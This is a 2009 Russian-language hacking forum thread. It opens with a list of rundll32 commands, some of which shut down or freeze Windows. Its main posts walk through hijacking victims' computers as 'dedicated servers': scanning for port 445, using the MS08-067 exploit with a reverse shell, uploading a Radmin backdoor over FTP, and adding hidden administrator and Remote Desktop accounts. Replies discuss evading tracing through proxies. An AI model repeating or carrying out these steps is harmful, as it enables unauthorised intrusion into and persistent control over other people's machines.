XAK!!!
| |
Phantom | Дата: Пятница, 20.03.2009, 12:55 | Сообщение # 1 |
Генерал-майор
Группа: Модераторы
Сообщений: 158
Статус: Offline
| Полезности rundll32.exe
|
|
| |
Phantom | Дата: Пятница, 20.03.2009, 12:55 | Сообщение # 2 |
Генерал-майор
Группа: Модераторы
Сообщений: 158
Статус: Offline
| rundll32 rnaui.dll,RnaWizard - вызов мастера "Удаленный доступ к сети". rundll32 rnaui.dll,RnaWizard /1 - вызов мастера "Удаленный доступ к сети" без отображения начального окна. rundll32 shell,ShellExecute - открыть Проводник (папка "Рабочий стол"). rundll32 shell32,Control_RunDLL - открыть в Проводнике папку "Панель управления". программ", в котором будет открыта вкладка с номером "n" (от 1 до 3). rundll32 shell32,Control_RunDLL main.cpl @0 - открыть диалог "Свойства мыши". rundll32 shell32,Control_RunDLL main.cpl @1 - открыть диалог "Свойства клавиатуры". rundll32 shell32,Control_RunDLL main.cpl @2 - открыть папку "Принтеры". rundll32 shell32,Control_RunDLL main.cpl @3 - открыть папку "Шрифты". rundll32 SHELL32,Control_RunDLL modem.cpl, add - открыть диалог "Свойства модема". rundll32 shell32,Control_RunDLL timedate.cpl - открыть диалог "Дата и время". * rundll32 shell32,OpenAs_RunDLL - вызвать диалог "Открыть с помощью...". rundll32 shell32,ShellAboutA HACKZONE.RU - информация о версии Windows. rundll32 shell32,SHExitWindowsEx 0 - закрыть все программы, перегрузить оболочку. rundll32 shell32, SHExitWindowsEx 1 - выключить ПК. rundll32 shell32, SHExitWindowsEx 2 - перегрузить ПК. rundll32 shell32,SHExitWindowsEx 4 - принудительно закрыть все программы. rundll32 shell32,SHExitWindowsEx 8 - выход из Windows и выключение ATX-совместимого ПК. rundll32 shell32,SHFormatDrive - вызов диалога форматирования диска А:. rundll32 SHELL32,SHHelpShortcuts_RunDLL AddPrinter - запуск "Мастера установки принтера". rundll32 shell32,SHHelpShortcuts_RunDLL Connect - запуск мастера подключения сетевого диска. rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage - распечатать тестовую страницу. rundll32 sysdm.cpl,InstallDevice_Rundll - вызов мастера установки оборудования. rundll32 url.dll,FileProtocolHandler %1 - открыть веб-страницу, где %1 - URL сайта (включая http://). rundll32 url.dll,MailToProtocolHandler %1 - создать новое письмо, где %1 - e-mail адресата. rundll32 user,CASCADECHILDWINDOWS - расположить все окна каскадом. rundll32 user,TILECHILDWINDOWS - расположить все окна по экрану. rundll32 user,disableoemlayer - сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать. rundll32 user,ExitWindowsExec - быстрая перезагрузка Windows. rundll32 user,WNetDisconnectDialog - вызов диалога "Отключение сетевого диска". rundll32 AppWiz.Cpl,NewLinkHere %1 - запуск мастера создания нового ярлыка, где %1 - путь к исходному файлу. rundll32 shell32.dll,Control_RunDLL hotplug.dll - диалоговое окно Отключение или извлечение аппаратного устройства rundll32 мсprint2.dll,RUNDLL_PrintTestPage - распечатать тестовую страницу на принтере. rundll32 netplwiz.dll,AddNetPlaceRunDll - вызов мастера подключения нового сетевого ресурса "Добавление в сетевое окружение". rundll32 user,RepaintScreen - выполнить команду "Обновить". rundll32 user,SetCaretBlinkTime n - задать частоту мигания курсора, соответствующую значению параметра n. rundll32 user,SetCursorPos - переместить курсор мыши в верхний левый угол экрана. rundll32 user,SetDoubleClickTime n - задать скорость двойного нажатия левой кнопки мыши (Double Click), соответствующую параметру n. rundll32 user,SwapMouseButton - поменять местами клавиши мыши (обратная смена невозможна). rundll32 user,WNetConnectDialog - вызов диалога "Подключение сетевого диска".
|
|
| |
Phantom | Дата: Пятница, 20.03.2009, 12:59 | Сообщение # 3 |
Генерал-майор
Группа: Модераторы
Сообщений: 158
Статус: Offline
| Сегодня мы рассмотрим метод добычи дедика по средством Metasploit 3.2 с эксплойтом MS08-067_netapi который использует уязвимость в службе SMB на 445 порту , уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда http://www.metasploit.com/ , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт http://www.angryziber.com/w/Download , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого 445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо ! Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить , Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы Предположим что FTP сервер у нас установлен и настроен , в cmd пишем Код: C:\>ftp ftp> o К 10.xx.xx.xx Связь с 10.xx.xx.xx . 220 Welcome to 10.xx.xx.xx FTP service. Пользователь (10.xx.xx.xx :(none)): anonymous 230 Login successful. ftp> Я настроил фтп на anonymous без пароля , ну вот мы зашли на свой фтп , смотрим где что у нас лежит командой Видим что лежит наш уже приготовленный радмин-сервер sys.exe зальём его на комп жертвы Файл залит , выходим с фтп и возвращаемся а наш шелл смотрим залит ли файл и запускаем его Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу Замечательно конект есть , вбиваем наш пароль и вот мы дома Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную
|
|
| |
Phantom | Дата: Пятница, 20.03.2009, 12:59 | Сообщение # 4 |
Генерал-майор
Группа: Модераторы
Сообщений: 158
Статус: Offline
| PHP код: cmd net user user pass /add net localgroup Administrators user /add net localgroup "Remote Desktop Users"user/add net accounts /maxpwage:unlimited exit Далее радмином в режиме "Телнет " запустим наш terminal.exe Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50 Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо ! Подробно про Метасплойт и эксплойты можно почитать тут http://www.metasploit.com/
|
|
| |
webadmin | Дата: Пятница, 20.03.2009, 21:46 | Сообщение # 5 |
Admin
Группа: Администраторы
Сообщений: 526
Статус: Offline
| Phantom, Это работать не будет, позвонишь скажу почему если интересно конечно
|
|
| |
Phantom | Дата: Пятница, 20.03.2009, 22:50 | Сообщение # 6 |
Генерал-майор
Группа: Модераторы
Сообщений: 158
Статус: Offline
| да уж если работает
|
|
| |
webadmin | Дата: Пятница, 20.03.2009, 23:14 | Сообщение # 7 |
Admin
Группа: Администраторы
Сообщений: 526
Статус: Offline
| Phantom, ти перед работает "за" не пропустив
|
|
| |
Seva | Дата: Понедельник, 07.09.2009, 16:46 | Сообщение # 8 |
Подполковник
Группа: Проверенные
Сообщений: 111
Статус: Offline
| Со своего айпишника такой фигней заниматься не стоит, поскольку знающее лицо зафиксирует тебя быстро, вычислить через провайдера не займет много времени, а через чужой, разве что по локалке, через прокси какой-то другой страны - это ж заморишься сканить)))
|
|
| |
webadmin | Дата: Понедельник, 07.09.2009, 17:09 | Сообщение # 9 |
Admin
Группа: Администраторы
Сообщений: 526
Статус: Offline
| Quote (Seva) через прокси какой-то другой страны - это ж заморишься сканить))) бесполезно, даже через прокси
|
|
| |
|
Copyright MyCorp © 2024 |
|
|